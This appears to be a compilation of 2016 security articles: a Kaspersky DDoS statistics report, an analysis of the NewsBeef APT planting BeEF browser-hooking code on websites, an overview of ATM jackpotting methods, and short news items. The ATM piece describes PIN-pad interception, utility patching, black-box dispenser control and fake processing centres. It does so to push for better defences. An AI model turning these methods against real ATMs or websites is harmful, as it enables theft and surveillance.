Kaspersky DDoS Intelligence Report for Q1 2016

Q1 events
We have selected the events from the first quarter of 2016 that, in our view, illustrate the main trends in the field of DDoS attacks and the tools used to perform them.
A record-breaking reflection DDoS attack
DDoS attacks using amplification/reflection techniques are still popular and allow cybercriminals to break their peak power records. From a technical point of view, amplification methods are nothing new in DDoS attacks, but cybercriminals are discovering new ways and resources to enhance the capacity of their botnets. For example, according to a recently published report, 2015 saw the largest ever DDoS attack on record at 450-500 Gbps.
DDoS attack on Trump
It’s possible that last year’s record didn’t last very long – at the very beginning of the year the official website of Donald Trump’s election campaign were subjected to DDoS attacks whose strength, according to unconfirmed sources, reached 602 Gbps. The hacktivist group New World Hacking claimed responsibility for both incidents.
Use of the DNSSEC protocol
Criminals are increasingly using the DNSSEC protocol to carry out DDoS attacks. The protocol is intended to minimize DNS spoofing attacks, but besides the domain data a standard DNSSEC reply also contains additional authentication information. Thus, unlike a standard DNS reply of 512 bytes, the DNSSEC reply comes to about 4096 bytes. Attackers exploit this feature to perform amplification DDoS attacks. They usually use domains in the government zone .gov, because in the US such domains are required by law to maintain DNSSEC.
Pingback attacks on WordPress
Web resources powered by the WordPress content management system (CMS) are still popular with cybercriminals carrying out DDoS attacks. Popular CMS-based resources often become targets of DDoS attacks exploiting the WordPress pingback function. The pingback function notifies the author of a post published on a WordPress site when someone else links to that post on another site running the same CMS. If the administrator of the site running WordPress has enabled the function, all links leading to the materials published on a site can perform a so-called pingback, i.e. send a special XML-RPC request to the original site. A huge number of pingback requests sent to the original site can cause a “denial of service”. This feature continues to attract the attention of cybercriminals and helps them perform DDoS attacks at the application level.
Linux Mint hacking
On 21 February 2016, the head of Linux Mint, Clement Lefebvre, reported that someone had managed to hack the project infrastructure including its official website and forum, and substituted the link to the legitimate ISO image of the Linux Mint 17.3 Cinnamon edition with their own URL. The hacker’s modified ISO contained malicious code that used infected machines to perform DDoS attacks.
Attacks on security companies
Cybercriminals also target companies working in information security, with most of the major players – especially those offering anti-DDoS services – having to regularly combat DDoS attacks on their resources. These attacks can’t cause much damage because all these resources are well-protected, but that doesn’t stop the cybercriminals.
In Q1 2016, resources in 74 countries were targeted by #DDoS attacks #KLreport
Tweet
In general, cybercriminals don’t go all out to bring down an IT security company’s site. The attacks tend not to last long, and in most cases, they are terminated as soon as the source notices that protection systems are working. The cybercriminals don’t want to waste their botnet resources when they could be earning money elsewhere. Nevertheless, the attacks continue.
Analysis of the correspondence on underground forums suggests that the criminal fraternity uses the websites of IT security companies as test bed, i.e. to test new methods and tools. This approach is no worse than others, but it does give us some valuable information. If worldwide DDoS statistics show the current state of things, then attacks on IT security companies allow us to some extent to predict the future of DDoS.
Data on the tactics, strength and types of attacks targeting Kaspersky Lab sites also allows us to forecast the trends in the DDoS industry for the coming months.
Once again, we have had to deal with amplification attacks. Their number has declined slightly compared to last year, but their maximum strength has increased fourfold. This confirms the trend of a general strengthening of these attacks – the criminals have to increase the strength to overcome protection measures used by Internet providers and information security companies. In our case, none of these attacks led to our sites being unavailable.
In Q1 2016, 93.6% of resources targeted by #DDoS attacks, were located in 10 countries #KLreport
Tweet
Considering the number of attacks on Kaspersky Lab resources in the first quarter of 2016, the “cream” of the cybercriminal community has gone back to the good old methods of attacks at the application level. Already in the first quarter of this year, we combated several times more HTTP(s) attacks than we did in the whole of 2015. Interestingly, there were several application-layer attacks performed simultaneously against a number of Kaspersky Lab resources. The strength of the DDoS resources was spread between several targets, reducing the effect on each target. This is most probably because the aim was not to disrupt Kaspersky Lab’s sites but to test tools and to see how we responded. The longest attack of this type lasted less than six hours.
We can assume that the proportion of Data Link layer attacks will gradually decline, and application-layer and multi-layer attacks (a combination of hardware and application-layer attacks) will come to the fore.
Powerful UDP amplification attacks came into general use a few years ago and are still a favorite tool of cybercriminals. The reasons for their popularity are clear: they are relatively easy to perform, they can be very powerful with a relatively small botnet, they often involve a third party, and it is extremely difficult to detect the source of the attack.
Although in Q1 of 2016 our Kaspersky DDoS Prevention service continued to combat UDP amplification attacks, we believe that they will gradually disappear. The once daunting task of combining the efforts of Internet providers and IT security companies to effectively filter the junk traffic generated by UDP attacks is almost solved. Having faced the risk of their main channels being clogged up due to large volumes of UDP packets, providers have acquired the necessary equipment and skills and cut this traffic off at the root. This means amplification attacks on a Data Link Layer are becoming less effective and, as a result, less profitable.
In Q1 2016, the largest numbers of #DDoS attacks targeted victims in #China, the #USA & #SouthKorea #KLReport
Tweet
To execute application-layer attacks on web services, large botnets or several high-performance servers and a wide output channel are required, as well as thorough preparatory work to study the target and find its vulnerabilities. Without this, they are ineffective. If the application-layer attack is carried out properly, it is difficult to counter it without blocking access to legitimate users – malicious requests look authentic and every bot faithfully fulfills the connection procedure. The only anomaly is the high demand for the service. We registered these sorts of attempts in the first quarter. This suggests that the DDoS market has developed so that complex, expensive attacks are becoming cost-effective, and better qualified cybercriminals are trying to make money using them.
Moreover, there is a real danger of these methods being used by cybercriminals en masse – the more popular the technique, the more tools are offered for it on the black market. And if application-layer attacks really do become widespread, we should expect to see a growth in the number of customers for this type of DDoS attack and more competent attackers.
Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.
The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.
This report contains the DDoS Intelligence statistics for the first quarter of 2016.
In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
The longest #DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days) #KLreport
Tweet
The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
Q1 Summary

In Q1, resources in 74 countries were targeted by DDoS attacks (vs. 69 in Q4 of 2015).
93.6% of the targeted resources were located in 10 countries.
China, the US and South Korea remained the leaders in terms of number of DDoS attacks and number of targets. France and Germany were newcomers to the Top 10.
The longest DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days) which is far less than the previous quarter’s maximum (13.9 days). Multiple attacks on the same target became more frequent (up to 33 attacks on one resource during the reporting period).
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios, while the number of UDP attacks continues to fall from quarter to quarter.
Overall, command servers remained located in the same countries as the previous quarter, but Europe’s contribution increased – the number of C&C servers in the UK and France grew noticeably.

Geography of attacks
In Q1 2016, the geography of DDoS attacks narrowed to 74 countries.
93.6% of targeted resources were located in 10 countries.

Distribution of DDoS attacks by country, Q1 2016 vs. Q4 2015
The Top 3 most targeted countries remained unchanged. However, South Korea’s share grew from 18.4% to 20.4% while the US’s contribution dropped by 2.2 percentage points. Also of note is the fact that Q1 2016 saw an increase in the number of attacks targeting resources in Ukraine – from 0.3% to 2.0%.
The statistics show that 94.7% of all attacks had targets within the Top 10 most targeted countries:

Distribution of unique DDoS attack targets by country, Q1 2016 vs. Q4 2015
The number of targets in South Korea increased by 3.4 percentage points. China’s share fell from 50.3% in Q4 2015 to 49.7% in the first three months of 2016. The percentage of DDoS attacks targeting resources in the United States also decreased (9.6% in Q1 2016 vs. 12.8% in Q4 2016). Despite the change in figures, South Korea, China and the US maintained their positions in the Top 3, coming well ahead of all other countries.
SYN #DDoS, TCP DDoS & HTTP DDoS remain the most common DDoS attack scenarios in Q1 2016 #KLreport
Tweet
The first quarter of 2016 saw Ukraine enter the Top 5 DDoS targets: its share grew from an insignificant 0.5% at the end of last year to 1.9% in Q1 2016.
Taiwan and the Netherlands’ share fell 0.8 and 0.7 percentage points respectively, meaning both dropped out of the Top 10 most attacked countries.
Changes in DDoS attack numbers
In Q1 2016, DDoS activity was distributed more or less evenly, with the exception of one peak on 6 February. The peak number of attacks in one day was 1,272, recorded on 31 March.

Number of DDoS attacks over time* in Q1 2016.
* DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.
As in the previous quarter, Monday (16.5% of attacks) was the most active day of the week for DDoS attacks. Thursday moved up to second (16.2%). Tuesday, which was in second place in Q4 2015 (from 16.4% to 13.4%), became the quietest day of the week in terms of DDoS attacks.

Distribution of DDoS attack numbers by day of the week
Types and duration of DDoS attacks
The ranking of the most popular attack methods remained constant from quarter to quarter. Those used most often were the SYN DDoS method, although its share fell compared to the previous quarter (57.0% vs 54.9%), and TCP DDoS which fell by 0.7 percentage point. The proportion of ICMP DDoS attacks grew significantly, rising to 9%; however, it did not affect the order of the Top 5.

Distribution of DDoS attacks by type
Noticeably, the figure for UDP DDoS has fallen continually over the last year: from 11.1% in Q2 2015 to 1.5% in Q1 2016.
Like the previous quarter, about 70% of attacks lasted no more than 4 hours. At the same time, the maximum duration of attacks decreased considerably. The longest DDoS attack in the last quarter of 2015 lasted for 333 hours; in Q1 2016, the longest registered attack ended after 197 hours.

Distribution of DDoS attacks by duration (hours)
C&C servers and botnet types
In Q1, South Korea remained the leader in terms of the number of C&C servers located on its territory, with its share growing from 59% in the previous quarter to 67.7% in the first quarter of 2016.
China came second; its share grew from 8.3% to 9.5%. As a result, China pushed the US down to third (6.8% vs 11.5% in Q4 of 2015). For the first time during the reporting period France appeared in the Top 10 countries hosting the most C&C servers. This correlates with the increased number of attacks in the country.

Distribution of botnet C&C servers by country in Q1 2016
99.73% of DDoS targets in Q1 2016 were attacked by bots belonging to one family. Cybercriminals launched attacks using bots from two different families (used by one or more botnet masters) in just 0.25% of cases. In 0.01% of cases three or more bots were used, mainly from the Sotdas, Xor and BillGates families.

Correlation between attacks launched from Windows and Linux botnets
When it came to the number of attacks launched from Windows and Linux botnets in Q1 2016, Windows-based botnets were the clear leader. For the third quarter in a row, the difference between the share of Windows- and Linux-based attacks was approximately 10 percentage points.
Conclusion
The events of the first quarter of 2016 once again demonstrated that the attackers are not resting on their laurels and are increasing their computing resources to perform DDoS attacks. Amplification scenarios, which have de facto become the standard tool for carrying out a powerful attack, exploit vulnerabilities in new network protocols. The reasons for an attack can vary: from disrupting pre-election campaigns and attacking candidates’ resources to showdowns between competitors on the black market. There have been frequent incidents of DDoS attacks targeting the very organizations that specialize in countering them. With the spread of vulnerable devices and workstations and the abundance of configuration drawbacks at the application level, the cost of a significant attack is going down. Therefore, reliable protection is needed to ensure these attacks are financially unviable for the criminals.



In rare unanimous move, House passes bill to protect email and cloud privacy

The U.S. House of Representatives, in a rare unanimous vote, has approved a bill to strengthen privacy protections for email and other data stored in the cloud.

The Email Privacy Act would require law enforcement agencies to get court-ordered warrants to search email and other data stored with third parties for longer than six months. The House on Wednesday voted 419-0 to pass the legislation and send it to the Senate.

The bill, with 314 cosponsors in the House, would update a 30-year-old law called the Electronic Communications Privacy Act (ECPA). Some privacy advocates and tech companies have been pushing Congress to update ECPA since 2011.
To read this article in full or to leave a comment, please click here



Contributing to the Annual DBIR

This year’s DBIR release from Verizon exposes valuable and well organized data on global incidents this past year. Our contributions on targeted attack activity and other areas to a report like this one over the past several years is important to help to improve cyber-security awareness and education both in the security industry and the general public.

The report is well organized, offering trending information from Point of Sale incidents to cyber-espionage, web application hacking, cybercrime, and skimming. And it simplifies most of the data into nine categories for ease of discussion. The data demonstrates that intruders will use tried and true techniques before moving on to the newest and most expensive. Like most years in cybersecurity, “It’s like déjà vu, all over again.” —Yogi Berra

You can download the 2016 DBIR here, its 85 pages of data and diagrams can help provide informed discussion around these topics on a greater scale. We look forward to another great writeup in 2017 from the DBIR guys at Verizon.



Freezer Paper around Free Meat

BeEF Wrapped Up and Delivered in 2016
In late February 2016, a University website in Iran stood out for thoroughly vetting its current and potential students and staff. The University’s web site served repackaged content from the Browser Exploitation Framework (BeEF) with embedded JavaScript content maintaining the potential to hook visitors’ web browsers, identify visited websites and domains, explore for vulnerabilities (we did not observe any auto-pwning), and provide tracking through evercookies. Even a partial listing of visited sites can be sensitive and valuable information, and this sort of “sites visited” data gathering via other techniques, like screengrabbing and keylogging, were observed in past APT incidents like the Madi campaigns. Currently, it’s advisable to avoid the site.

The embedded BeEF content appears not to be fully configured, and only partially implemented. Perhaps a limited data set was of interest for this attacker, or this was an early attempt at deploying BeEF.
This incident is interesting because at the same time and a bit earlier, another group was heavily relying on repackaging open source offensive security product in their toolset by deploying both BeEF and Metasploit-produced components across a select set of strategic web compromises. This particular APT has years of low-tech elaborate social engineering schemes and re-purposed open source efforts under its belt.

While we call them the NewsBeef APT, they have been reported in the past as Charming Kitten or Newscaster in 2014, social engineering their way into sensitive circles of trust with spoofed LinkedIn profiles and phony news media organizations.
They continue to be highly active, but this time, they are using a slightly more technical toolset. On one hand, they have developed skills or discovered tools to compromise select web applications and sites, supporting their watering hole campaigns. On the other hand, they have repackaged leaked bot source code and repackaged open source Metasploit and PowerSploit components to produce and administer backdoors and downloaders.
Newsbeef/Newscaster will find a way to compromise a web site, usually the vulnerability appears to be CMS related, in an outdated WordPress plugin, Joomla version, or Drupal version. Attackers usually perform one of two things, Newsbeef has been performing the first of the two:

inject a src or iframe link into web pages or css sheets
inject the content of an entire BeEF web page into one of the internally linked javascript helpers

The injected link will redirect visitors’ browsers to a BeEF server. Usually, the attackers deliver some of the tracking and system/browser identification and evercookie capabilities. Sometimes, it appears that they deliver the metasploit integration to exploit and deliver backdoors (we haven’t identified that exploitation activity in our ksn data related to this group just yet). Sometimes, it is used to pop up spoofed login input fields to steal social networking site credentials. We also haven’t detected that in ksn, but some partners have privately reported it about various incidents. But we have identified that attackers will redirect specific targets to laced Adobe Flash and other installers from websites that they operate.
So, the watering hole activity isn’t always and usually isn’t delivering backdoors. Most of the time, the watering hole injections are used to identify and track visitors or steal their browser history. Then, they deliver the backdoors to the right targets.
In addition to the University site and the NewsBeef APT, in the past couple of months, we identified a variety of compromised sites around the world serving the BeEF. Most are cleaned up. Deployments to interesting and strategic web sites and their true reach on a global scale appears to be on the increase:

Middle eastern embassy in the Russian Federation
Indian military technology school
High conflict regional presidency
Ukrainian ICS Scanner mirror
European Union education diversification support agency
Russian foreign trade management organization
Progressive Kazakh news and politics media
Turkish news organization
Specialized German music school
Japanese textile manufacturing inspection corporate division
Middle Eastern social responsibility and philanthropy
surprisingly popular British “lifestyle” blog
Algerian University’s online course platform
Chinese construction group
Russian overseas business development and holding company
Russian gaming developer forum
Romanian Steam gaming developer
Chinese online gaming virtual gold seller
Brazilian music instrument retailer

 
BeEF Capabilities
Key to these incidents are the development, distribution, and ease of use of toolkits like BeEF.

BeEF itself is an open source collection of tools and tricks, some years old, that combined together can effectively hook a visiting web browser for evaluation and full exploitation. Because of its capabilities, we have seen increased adoption of the framework for the past year or so.

Browser enumeration and reporting
Plugin enumeration and reporting
Retrieve visited domains (based on an old browser cache fetch timing trick)
Social engineering via live sessions and phishing within the browser
Network exploration, discovery, and exfiltration tunneling
Metasploit exploit integration and autopwning
Evercookie deployment for persistent tracking – multiple platforms
XSS evaluation and exploitation

At the same time, many of the techniques implemented are very old and public. The kit is extensible, customizable, and integrates with metasploit for autopwnage. Some of the techniques were discussed during Jeremiah Grossman’s 2006 Black Hat conference presentation. The delay in deployment for techniques of this type indicates that some teams are dependent on open source tool packaging and ease of use. We have seen this sort of reliance on both open source offensive toolkits and legitimate software in the past from APT like Crouching Yeti, TeamSpy, and now the Newsbeef.
Fighting against the use of browser hooking frameworks for identification, tracking, live session social engineering, and precision and auto-exploitation effectively requires a mix of technologies. When these JavaScript-based frameworks are used in a malicious manner, the combination of network and host based detection is required to fully handle more serious incidents.
Unfortunately, these incidents are on the increase. You can disable JavaScript in your own browser with NoScript, but that’s much like just moving to Lynx or a text-based browser – people don’t want that because it kills functionality in the browser they do want. A Chrome plugin that detects the BeEF cookie is easily evaded by serious players. And preventing the tracking methods altogether is another whole ball of wax, because much of the functionality is tied into legitimate web pages by third party marketers and retailers.
Preventing the social engineering sessions for credential theft and Metasploit exploit integration makes immediate sense and can be incorporated at the network and more effectively at the host level. AntiAPT can help wipe out most of an operation on the network at scale, but these measures can be evaded as well. In other words, dealing with a determined attacker using tools like this one is difficult.
References
NEWSCASTER – An Iranian Threat Inside Social MediaThe Browser Exploitation Framework ProjectMetasploit: Penetration Testing Software



Malware and non-malware ways for ATM jackpotting. Extended cut

Cash machines have been part of our lives since 1967 when a London branch of Barclays Bank unveiled the first ATM. Millions of people around the world now use ATMs every day to withdraw cash, pay in to their account or make a variety of payments. When using ATMs people give little or no thought to the hardware, software or security of the machines. Unfortunately, ATM manufacturers and their primary customers – banks – don’t pay much attention to the security of cash machines either. This is confirmed by the increasing number of thefts from ATMs using non-destructive methods, i.e. without the use of metal cutting tools or explosives.
To understand why this is happening, let’s first look at what exactly a cash machine is.
Hardware
An ATM is basically a construction kit. The manufacturer builds them from a dispenser, a card reader and other units produced by different companies. The units are placed in a housing which usually consists of two parts: the top box called the cabinet, or the servicezone, and the lower section called thesafe.
The cabinet includes units such as the system unit (yes, a standard system unit, which sometimes even has the same housing as a typical home computer), the EPP (Encrypting PIN Pad) the card reader, and so on. The service zone, according to ATM manufacturers, contains everything that makes it impossible to access the money. Probably for this reason the cabinet cover is made of plastic and the service zone is protected from unauthorized access by just a simple lock. By the way, a set of locks and separate keys can both easily be purchased online as the manufacturers install the same locks on their devices, and most banks usually don’t bother to replace them.
The safe has much better protection: it is a ‘sandwich’ of steel and concrete with two types of locks – one coded (electronic or limb, sometimes electro-mechanical) and the other a key lock (usually a lever tumbler lock). The safe contains the devices directly related to the money – a dispenser from which cash is withdrawn, and a cash-in module.
All devices are connected to the system unit, which in this case performs the function of the host (as we shall refer to it) via the USB or RS232 ports (often referred to as a COM port). Sometimes these ports are located directly on the system unit; if there aren’t enough ports, a USB/COM hub is used. Older ATM models can still be found that are connected via the SDC bus.
Software
The software used on almost every ATM is straightforward:

operating system
ATM units management software
software used to interact with the user (ATM consumer or operator)
software used to communicate with the processing center (which provides the information and technological sides of the transaction)
anti-virus software, or integrity control software.

This is sufficient for the ATM to carry out its immediate functions, but for some reason certain banks also install Acrobat Reader 6.0, Radmin, TeamViewer and other unnecessary and in some cases even dangerous software.
When it comes to the operating system, the vast majority of ATMs still use … Windows XP! Despite the fact that Microsoft stopped issuing security updates for it in April 2014. Of course, 0-day vulnerabilities for this system will remain unpatched. The engineers servicing ATMs often think that if the ATM is working, it is better “not to touch” (read: “not to update”) it. As a consequence, some cash machines still have the unpatched critical vulnerability MS08-067 which allows remote code execution.
ATM units are implemented on microcontrollers based on real-time operating systems (RTOS), which is particularly irksome for the guys with IDA Pro because static analysis is almost unheard for such systems.
That’s basically all the information cybercriminals need to start hacking.
Malware
In 2009, the appearance of Trojan Backdoor.Win32.Skimer caught the world’s attention: it was the first malicious program targeting ATMs. Skimer attacked ATMs from a particular manufacturer – one of the market leaders. Using this malicious program the criminals emptied the cash dispensers and also skimmed the data from bank cards processed in infected ATMs. Since then, ATMs of different manufacturers have been repeatedly exposed to malware infection.
The process of stealing money from ATMs using malware consists of four stages:

The attacker gains local/remote access to the machine.
Malicious code is injected into the ATM system.
As a rule, infection is followed by rebooting of the ATM. The system seems to reboot in standard mode but at the same time comes under the control of a malicious program, i.e. cybercriminals.
The final stage, i.e. the main aim of the process, is the theft of money.

Getting access to the inside of an ATM is not a particularly difficult task, as the experts at the Positive Hack Days, the international forum on practical information security, demonstrated. The process of infecting is also fairly clear – arbitrary code can be executed on an insecure (or insufficiently secure) system. There seems to be no problem with withdrawing money either – the malware interface is usually opened by using a specific key combination on the PIN pad or by inserting a “special card”, and then all you need to do is stuff your pockets full of cash.
Here we will focus on how a malicious program can gain control of an ATM.
The XFS standard
So the attackers have infected the ATM system unit. What next?
Here again, a short explanation is required. As already mentioned, the ATM is managed by a Windows-based application. Its task is to organize interaction between the user (client or services), the processing center which sends commands to the ATM and the equipment that executes these commands. The message exchange with the processing center occurs via direct connect protocols (NDC or DDC): users communicate with the GUI while service providers are responsible for the operation of each ATM unit (gateways to these units). To send commands to the service providers and on to the equipment as well as to receive status messages, a level called XFS Manager is used in accordance with WOSA.

ATM operations in the context of the XFS standard
XFS (CEN/XFS, and earlier WOSA/XFS), or the eXtensions for Financial Services, is a standard that provides a client-server architecture for financial applications on the Microsoft Windows platform, especially peripheral devices such as ATMs. XFS is intended to standardize software so that it can work on any equipment regardless of the manufacturer, and provides a common API for this purpose.
Thus, any application that is developed with the XFS standard in mind can control low-level objects by using only the logic described in this standard. And that application could well be the Tyupkin backdoor or any other malicious program.
What opportunities does XFS offer?
For example, the dispenser, which is the most interesting part for the attackers, can give out money without authorization. Or use of XFS on some ATM models means cybercriminals can manipulate the code to open the safe and unlock the ATM cassettes.
Exploitation of the MS08_067 vulnerability allowing execution of arbitrary code. The video was shot by experts at BlackHat Europe 2014
With regard to the card reader, XFS allows the reading and recording of data from the bank card magnetic stripe and even retrieval of the transaction history stored on the EMV card chip.
Of special note is the Encrypting PIN Pad (EPP). It is believed that the PIN cannot be intercepted because it is entered on the ATM PIN pad and is converted directly inside the encryption module into a PIN block (EPP contains keys to do this, two of which are in the bank’s Hardware Security Module). However, XFS allows the PIN pad to be used in two modes:

Open Mode – for entering different numeric values, such as the sum to be withdrawn;
Secure Mode, which EPP switches to in order to enter a PIN and encryption keys.

This allows cybercriminals to implement a “man-in-the-middle” (MiTM) attack. They only have to intercept the command sent from the host to the EPP to switch to Secure Mode and then to inform the device that work is continuing in Open Mode. In the reply message, the EPP will send the keystrokes as plain text – exactly what the attacker needs.
But what about authentication and exclusive access? And surely the standard’s specifications are inaccessible?
Unfortunately, this is not the case with XFS. The standard does not provide any authentication, and exclusive access to service providers is implemented, but not for security reasons. This is just a single-threaded command sending function to avoid accidentally breaking delicate hardware by simultaneously sending two identical commands.
Surprisingly, although it is a standard for financial applications, it doesn’t even mention security. Where can you find the specifications to check if this is true? Just try entering “ATM XFS” in any search engine and you’ll find the answer among the first few results.
Integrity control software
Banks sometimes use integrity control software on their ATMs that supposedly prevents the execution of unauthorized code based on a whitelist, controls connected devices and drives, as well as providing other useful methods which should, in theory, counter attacks.
But we shouldn’t forget that first of all it is software, and just like any other software, it’s not perfect. It may be vulnerable to attacks as such kiosk mode bypassing, whitelist bypassing, buffer overflow, privileges escalation to SYSTEM user, etc. As you know, existing vulnerabilities often allow cybercriminals to gain access to the operating system and to do their dirty work.
Undocumented features
The bad guys may use modified utilities that were originally provided by ATM developers or manufacturers to test a machine’s operability. One of the functions of these utilities is to test the dispenser function, including the dispensing of cash. In order to carry out a test, the engineer has to confirm his legitimacy by opening the safe door or performing actions with the dispenser cassettes. The logic is simple: if you can open the safe, you have the key, i.e. you are a licensed engineer or a cash-in-transit guard. But by simply replacing a couple of bytes in the utility, the “right” people can “test” cash withdrawals without any checks.
Yet another way criminals have of lining their pockets is to change the denomination of banknotes dispensed by the ATM using a diagnostic utility. As a result, the attacker receives banknotes with the largest nominal value (e.g., a 100 dollar/euro banknote) while the ATM “thinks” it is dispensing the smallest of the available denominations (five or ten). It means several hundred thousand can be withdrawn from a card with a balance of just a few hundred.
Black box
So-called black box attacks are another type of attack that is getting increased coverage in the news. On surveillance camera videos the following occurs: someone opens the service zone, connects a magic box to the ATM, closes the cabinet and leaves. A little later several people who appear to be customers approach the ATM and withdraw huge sums of money. Of course, the criminals retrieve their little device from the ATM once they have achieved their goal. Usually, these black box attacks are only discovered a few days later when the empty cassettes and the withdrawal logs don’t tally, leaving the bank employees scratching their heads.
However, there is no magic involved – the attackers connect a specially programmed microcomputer to the dispenser in such a way that it bypasses the security measures implemented on the host (antivirus, integrity control, full disk encryption, etc.).
Communications insecurity
As mentioned above, USB, RS232, or SDC can be used as a data transmission channel between the system unit and the devices. It’s likely that nothing will prevent the attackers from sending the necessary commands directly to the device port bypassing its service provider. The standard interfaces often do not require any specific drivers. Authorization is not required either, which basically makes these insecure proprietary protocols an easy target – just sniff and replay. The result is direct control over ATM units, the use of undocumented functions (e.g., changing the unit firmware). The criminals may also use a software or hardware traffic analyzer, installing it directly on the port of a particular device such as a card reader in order to obtain the transmitted data. And this analyzer will be difficult to detect.
Direct control over the dispenser means the ATM cassettes can be emptied without any entries being made in the ATM software logs.

A typical packet – the command to dispense a banknote from the first cassette of the dispenser
For those who are unaware, it may look like magic. Every great magic trick consists of three parts or acts. There are dispensing money from the cassette, opening the shutter, and presenting money to the client.
A black box attack on an ATM. Video was prepared by experts for demonstration purposes at BlackHat Europe 2014
Hardware skimmers are ‘so yesterday’. Direct connection makes it possible to read and record the magnetic strip of a credit card. Traffic analyzers, which are freely available on the Internet, can also be used as a direct connection. Rumor has it that in one fairly large bank all the ATMs were used as skimmers: the attackers had found vulnerabilities in the bank’s network and installed a USB sniffer on the ATMs, allowing them to collect bank card data in plain text for five years! Who knows, maybe your card was among those affected.

The intercepted data of a Track2 card
The network
The connection between ATMs and the processing center can be protected in various ways. For example, using a hardware or software VPN, SSL/TLS encryption, a firewall or MAC-authentication, implemented in xDC protocols. However, all these measures often appear to be so complex for banks that they don’t bother using any network protection at all.
In such cases, a MiTM attack can be launched that will result in the attacker getting both bank card data and all the money in the ATM. This requires remote access to the device, which is usually obtained by using vulnerable services that can be accessed from the Internet, as well as social engineering techniques. Physical access to the network hardware, including the ATM Ethernet-cable will also suffice.
On the way to the real processing center a fake one pops up; it sends commands to the ATM software to dispense banknotes. Withdrawing money is possible with any card, even one that has expired or has a zero balance, as long as the fake processing center “recognizes” it. A fake processing center can be either “homemade” software that supports communication with the ATM via the xDC-protocol, or a processing center simulator originally designed to check network settings (yet another “gift” from the vendors to the cybercriminals).

The commands for giving out 40 banknotes from the fourth cassette sent from a fake processing center and stored in the ATM software logs. They look almost like the real thing.
Where do the criminals find ATMs that can be attacked via the network? Do they scan all the nearby networks or buy the information on underground forums?
It turns out that you just need to enter the correct request in a search engine – https://www.shodan.io/ (this Internet of Things scanner is well-known by the experts). The data collected by this scanner is usually enough to launch such attacks.
#Shodan shows thousands of exposed ATMs potentially vulnerable to a network attack @_endless_quest_ #TheSAS2016 pic.twitter.com/9E3SSYwG89
— Eugene Kaspersky (@e_kaspersky) 9 февраля 2016 г.

Or you could just take a closer look at the ATMs in retail and business centers.

Sometimes the ATM system can be accessed without even opening it – all the communications are located on the outside
Who’s to blame and what can be done
This part is usually the most depressing, and here’s why.
When we detect a vulnerability while analyzing ATM security, we send a notification to the vendor with a description of the problem and ways to solve it. And often the answers are bewildering:
“The vulnerabilities are essentially normal specifications of the card readers and not unexpected. As long as the ATM is running within normal parameters, these problems cannot possibly occur.”
“However this vulnerability is inherent in the USB technology and is expected be mitigated by the use of appropriate physical controls on access to the ATM top box.”
“We regret informing you that we had decided to stop producing this model more than 3 years ago and warranties for our distributors been expired.”
Indeed, why should vendors bother about ATMs with expired warranties that are still used by banks around the world, and whose physical security often leaves much to be desired? Unfortunately, reality shows that manufacturers are only interested in selling new products and not in eliminating the shortcomings of existing systems, while banks lack the necessary skills to cope with the problems on their own.
Fortunately, some manufacturers understand the dangers of unauthorized ATM use, and release security updates. To prevent attacks on dispensers, two-way authentication and cryptography are used. It should be noted, however, that not all cryptography is correctly implemented cryptography.
While the existing countermeasures can protect ATMs from malware, they are powerless against black box or network attacks. A huge number of security flaws and vulnerabilities that can be exploited with minimum expertise make cash machines a prime target for those desperate to get rich illegally.
So. Is everything lost?
ATM manufacturers can reduce the risk of attack on cash machines.

Firstly, it is necessary to revise the XFS standard with an emphasis on safety, and introduce two-way authentication between devices and legitimate software. This will help reduce the likelihood of unauthorized money withdrawals using Trojans and attackers gaining direct control over ATM units.
Secondly, it is necessary to implement “authenticated dispensing” to exclude the possibility of attacks via fake processing centers.
Thirdly, it is necessary to implement cryptographic protection and integrity control over the data transmitted between all hardware units and PC inside ATM.

And what should banks do? They need to take action!
Encourage those who sell ATMs and software to make them secure. The manufacturer must eliminate vulnerabilities as soon as possible; it is necessary to tell them about it as often as possible. To prevent hacking of ATMs it is necessary to make use of all the available protection tools. A completed PCI DSS Self-Assessment Questionnaire is not a silver bullet and won’t protect ATMs from attacks, or banks from financial and reputational losses. Proactive protection, including regular ATM security assessment and penetration testing, is better (and often much cheaper) than security incident and the subsequent investigation.
Bad guys are watching.
Stay safe!
PS: No cash machines were harmed in the preparation of this material.
PPS: This overview of the security issues in cash machines is not intended as a hacking guide.



Sirin Labs to sell mysterious SP1 phone for the privacy conscious

An international group of investors announced today that Sirin Labs, a startup with $72 million in venture funding, is planning to create a smartphone that combines premium performance and functionality with strong privacy protection.
Sirin’s announcement gave few details about the device, internally dubbed the SP1, but the company says that interested parties won’t have long to wait for additional information, as it should go on sale within the next two months. The SP1’s design, according to Sirin, will attempt to graft high-end flagship features onto a far greater emphasis on security than most modern smartphones.
The group is led by the founders of Israeli VC firm Singulariteam, Moshe Hogeg and Kenges Rakishev, along with former Googler and startup veteran Tal Cohen, who serves as CEO. Sirin has also employed a former product director for Sony Mobile, Fredrik Oijer.
To read this article in full or to leave a comment, please click here



Spammers all geared up for Euro 2016!

Major football tournaments such as the World Cup and the European Championship, traditionally attract a lot of spammer activity. Euro 2016 will be held this summer in France, and it’s not only the fans and players who are getting ready but also Internet fraudsters. The latter have started sending out fake notifications about lottery wins dedicated to the upcoming tournament. Their emails often contain attachments adorned with graphic elements including official emblems, the Euro 2016 logo and those of its sponsors.

